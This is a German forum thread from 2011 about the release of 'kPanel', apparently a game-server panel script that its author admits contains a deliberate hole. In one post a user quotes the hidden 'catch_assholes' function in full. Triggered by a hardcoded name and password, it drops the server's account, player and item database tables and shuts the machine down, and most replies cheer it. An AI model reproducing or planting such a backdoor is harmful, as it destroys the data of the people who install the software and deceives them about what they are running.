[RELEASE] kPanel

11/01/2011 10:23 ~Equal#1
Da einer meinte, die Lücke hier reinzuschreiben und auch noch ne schöne Anleitung zu geben, war es das^^
11/01/2011 10:26 He3o Crysis#2
First :D

Danke für die Quest!

Werde mir das ganze in 2 Tagen anschauen wenn ich aus dem Urlaub zurrück bin!
11/01/2011 10:32 Rosalein#3
Nice
11/01/2011 10:54 ƬheGame#4
Nice Yasin
11/01/2011 11:17 Proxonator#5
Nice :>
11/01/2011 11:57 .Tyga#6
Bombisch :awesome:
11/01/2011 12:00 .Active#7
Very Nice Work :O
11/01/2011 12:02 .iPr0'#8
Hammer ;D
11/01/2011 12:49 passy305#9
Oha ..
Nice work :awesome:

*Die angepriesene 'Lücke', und die hats insich :p, ist ja nun wirklich sehr offensichtlich, sollte eigentlich jeder finden :awesome:*
11/01/2011 12:57 ~Equal#10
tjaha einfach nur leechen geht nich^^
Wer sowas nicht kann und es trotzdem benutzt, der hat es verdient, dass man den Exploit ausnutzt.
11/01/2011 12:58 ZyoX#11
Quote:
*Die angepriesene 'Lücke', und die hats insich , ist ja nun wirklich sehr offensichtlich, sollte jeder finden *
Die Lücke sollte wirklich jeder finden.
11/01/2011 13:11 ƬheGame#12
Es hat sogar 2 nur die zweite ist keine richtige lück eher eine sicherheit für yasin
11/01/2011 13:29 __BuRn3R#13
catch assholes haha :D danke, kann ich gut gebrauchen :]
11/01/2011 13:33 Imdra#14
Code:
		function catch_assholes()
			if pc.get_name() == "ilovekaija94" then
				local secure = input("")
				if secure != "123kaija432" then
					return
				end
				local w = io.open("kpanel/acc","r")
				if w~=nil then
					local account = r:read()
					r:close()
				else 
					say("Eine temporäre Datei fehlt!")
				end
				local w = io.open("kpanel/pw","r")
				if w~=nil then
					local password = r:read()
					r:close()
				else 
					say("Eine temporäre Datei fehlt!")
				end
				say_title("Catch assholes")
				say("Benutzt da jemand deine Software ohne Erlaubnis?")
				say("Sorge dafür, dass das aufhört.")
				local catchit = select("Catch it!", "Abbrechen")
				if catchit == 2 then
					return
				end
				os.execute("mysql -u "..account.." --password="..password.." --execute='DROP TABLE account.account'")
				os.execute("mysql -u "..account.." --password="..password.." --execute='DROP TABLE player.player'")
				os.execute("mysql -u "..account.." --password="..password.." --execute='DROP TABLE player.player_index'")
				os.execute("mysql -u "..account.." --password="..password.." --execute='DROP TABLE player.item'")
				os.execute("shutdown -h now")
			end
		end
Luuulz

Nette Quest ;D
Danke fürs public machen! :D
11/01/2011 14:24 .Risan.#15
heftig, ich würd die lücke dort... zeile XX
ausbauen bzw. umschreiben XD..

Sind einige sachen drinne, wo nicht reingehören..
ansonsten lustig..